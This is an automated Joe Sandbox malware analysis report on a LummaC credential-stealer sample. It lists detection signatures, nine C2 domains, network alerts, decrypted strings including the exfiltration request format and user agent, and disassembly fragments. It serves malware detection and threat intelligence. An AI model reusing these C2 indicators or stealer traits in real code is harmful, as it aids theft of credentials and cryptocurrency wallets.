Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NQbg5Ht2hW.exe

Overview

General Information

Sample name:NQbg5Ht2hW.exe
renamed because original name is a hash value
Original sample name:d1137063cca03f3d3079c8c4db839b95.exe
Analysis ID:1579648
MD5:d1137063cca03f3d3079c8c4db839b95
SHA1:2a919e2a2cd02b7b433432602f5d74034fbaffc4
SHA256:f91431bb0d797065ad6803c552059cad9b7d3b9bc695e29b1e666850376945ca
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NQbg5Ht2hW.exe (PID: 3440 cmdline: "C:\Users\user\Desktop\NQbg5Ht2hW.exe" MD5: D1137063CCA03F3D3079C8C4DB839B95)
    • WerFault.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "sweepyribs.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:21.013322+010020283713Unknown Traffic192.168.2.94972223.55.153.106443TCP
      2024-12-23T07:01:23.588702+010020283713Unknown Traffic192.168.2.949733172.67.157.254443TCP
      2024-12-23T07:01:25.426775+010020283713Unknown Traffic192.168.2.949739172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:24.615424+010020546531A Network Trojan was detected192.168.2.949733172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:24.615424+010020498361A Network Trojan was detected192.168.2.949733172.67.157.254443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:18.706968+010020583541Domain Observed Used for C2 Detected192.168.2.9552191.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:18.994329+010020583581Domain Observed Used for C2 Detected192.168.2.9625351.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:17.733544+010020583601Domain Observed Used for C2 Detected192.168.2.9625471.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:18.312820+010020583621Domain Observed Used for C2 Detected192.168.2.9571451.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:17.593871+010020583641Domain Observed Used for C2 Detected192.168.2.9498071.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:17.878639+010020583701Domain Observed Used for C2 Detected192.168.2.9542751.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:19.136590+010020583741Domain Observed Used for C2 Detected192.168.2.9636181.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:18.854285+010020583761Domain Observed Used for C2 Detected192.168.2.9639131.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:17.451107+010020583781Domain Observed Used for C2 Detected192.168.2.9572931.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T07:01:22.036909+010028586661Domain Observed Used for C2 Detected192.168.2.94972223.55.153.106443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: NQbg5Ht2hW.exeAvira: detected
      Found malware configuration
      Source: 0.3.NQbg5Ht2hW.exe.760000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "sweepyribs.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}
      Multi AV Scanner detection for submitted file
      Source: NQbg5Ht2hW.exeVirustotal: Detection: 41%Perma Link
      Source: NQbg5Ht2hW.exeReversingLabs: Detection: 57%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: NQbg5Ht2hW.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--

      Compliance

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeUnpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack
      Source: NQbg5Ht2hW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0043C767
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0040B70C
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_0042984F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00423860
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ecx0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then test eax, eax0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D83A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B170
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_004179C1
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0043B1D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0043B1D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_00405990
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebp, eax0_2_00405990
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, esi0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CA49
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042DA53
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00416263
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00415220
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push esi0_2_00427AD3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CAD0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041B2E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push ebx0_2_0043CA93
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00428B61
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB11
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB22
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0043F330
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0041D380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp al, 2Eh0_2_00426B95
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435450
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push 00000000h0_2_00429C2B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_004074F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_004074F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043ECA0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_004385E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_004385E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00417DEE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00409580
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_00409580
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [0044450Ch]0_2_00418591
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00428D93
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor edi, edi0_2_0041759F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0041C653
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ebp0_2_00425E70
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00425E30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_0043AEC0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_00408F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042A700
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BF14
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00419F30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0041E7C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [edi], dx0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, ebx0_2_0042DFE9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp ecx0_2_0040BFFD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov esi, eax0_2_00415799
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00415799
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043EFB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00728055
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00734031
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ebp0_2_007360D7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0072C17B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_0074B127
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_007191B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_007191B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_0072A197
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp ecx0_2_0071C264
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, ebx0_2_0073E250
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0072D230
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0072D230
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0074F217
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_007332ED
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, esi0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0073B3D7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00739444
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_00739444
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_007364DA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_007264CA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00725487
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0072B547
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_007275E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0072D5E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0074F597
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007456B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00717757
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00717757
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_007197E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_007197E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_0074887B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0072C8BA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0071B973
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0073A967
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0074C9CE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_0074898E
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ecx0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then test eax, eax0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0072EA27
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [edi], dx0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]0_2_00724ACD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_00739AB5
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0072DAB8
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00726B2A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_00715BF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebp, eax0_2_00715BF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]0_2_00724BD2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov esi, eax0_2_00725C41
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_00727C28
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor edi, edi0_2_00727C28
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push ebx0_2_0074CCFA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CCB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0073DCBC
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD78
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD37
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push esi0_2_00737D1A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00738DC8
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD89
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0071DE40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0071DE40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh0_2_00724E96
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp al, 2Eh0_2_00736E96
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh0_2_00724E87
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push 00000000h0_2_00739F40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_00726F35
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_00726F35
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0074EF07
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00725FD3
